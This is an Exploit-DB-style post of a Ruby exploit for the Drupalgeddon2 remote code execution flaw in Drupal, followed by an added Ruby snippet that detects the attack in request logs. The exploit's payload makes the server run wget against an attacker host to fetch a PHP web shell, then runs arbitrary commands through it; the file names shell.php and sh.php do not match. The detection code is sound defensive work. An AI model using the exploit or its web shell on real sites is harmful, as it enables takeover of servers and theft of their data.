Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execut
Source: vfocus.net Author: HansTopo Published: 2018-04-16
# EDB-Note. Have the contents of "shell" on http://attacker/shell.php
 
require 'net/http'
 
# Hans Topo ruby port from Drupalgeddon2 exploit.
# Based on Vitalii Rudnykh exploit
 
target = ARGV[0]
command = ARGV[1]
 
url = target + '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
 
shell = "<?php system($_GET['cmd']); ?>"
 
payload = 'mail%5B%23markup%5D%3Dwget%20http%3A%2F%2Fattacker%2Fshell.php%26mail%5B%23type%5D%3Dmarkup%26form_id%3Duser_register_form%26_drupal_ajax%3D1%26mail%5B%23post_render%5D%5B%5D%3Dexec'
 
uri = URI(url)
 
http = Net::HTTP.new(uri.host,uri.port)
 
if uri.scheme == 'https'
    http.use_ssl = true
    http.verify_mode = OpenSSL::SSL::VERIFY_NONE
end
 
req = Net::HTTP::Post.new(uri.path)
req.body = payload
 
response = http.request(req)
 
if response.code != "200"
    puts "[*] Response: " + response.code
    puts "[*] Target seems not to be exploitable"
    exit
end
 
puts "[*] Target seems to be exploitable."
 
exploit_uri = URI(target+"/sh.php?cmd=#{command}")
response = Net::HTTP.get_response(exploit_uri)
puts response.body
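
For defenders, the request shape the script above builds can be recognised by Drupal render-array keys (names starting with `#`) arriving in user input. The following is an added detection example, not part of the original exploit or of Drupal's code; the function names and the sample log lines are constructed for illustration.

```ruby
require 'uri'

# Percent-decode repeatedly (bounded) so double-encoded input is still seen.
def deep_decode(str)
  3.times do
    decoded = URI.decode_www_form_component(str).scrub('?')
    return decoded if decoded == str
    str = decoded
  end
  str
rescue ArgumentError # malformed %-sequence: inspect what we have so far
  str
end

# Returns the reasons a request carries Drupal render-array keys ('#...') in
# user input; an empty array means nothing was found.
def render_key_reasons(target, body = nil)
  reasons = []
  { 'query' => target.split('?', 2)[1], 'body' => body }.each do |where, raw|
    raw.to_s.split('&').each do |pair|
      name, value = pair.split('=', 2).map { |part| deep_decode(part) }
      next if name.nil?
      reasons << "#{where}: render-array key in parameter name" if name.match?(/(?:\A|\[)#\w/)
      hits_property = value.to_s.split('/').any? { |seg| seg.start_with?('#') }
      reasons << "#{where}: element_parents targets a '#' property" if name == 'element_parents' && hits_property
    end
  end
  reasons.uniq
end

# Scans access-log lines (request line in double quotes) and returns
# [line_number, reasons] for each flagged request. Bodies are not logged,
# so only the query string is checked here.
def flag_log_lines(lines)
  lines.each_with_index.filter_map do |line, idx|
    m = line.match(/"(?:GET|POST) (\S+) HTTP\/[\d.]+"/)
    next unless m
    reasons = render_key_reasons(m[1])
    [idx + 1, reasons] unless reasons.empty?
  end
end

# Constructed sample lines (documentation addresses), not real traffic.
SAMPLE_LOG = [
  '192.0.2.10 - - [16/Apr/2018:10:00:01 +0000] "GET /user/register HTTP/1.1" 200 5120',
  '192.0.2.77 - - [16/Apr/2018:10:00:07 +0000] "POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1" 200 310',
  '192.0.2.10 - - [16/Apr/2018:10:00:09 +0000] "GET /search?q=%23drupal HTTP/1.1" 200 900'
].freeze
```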
 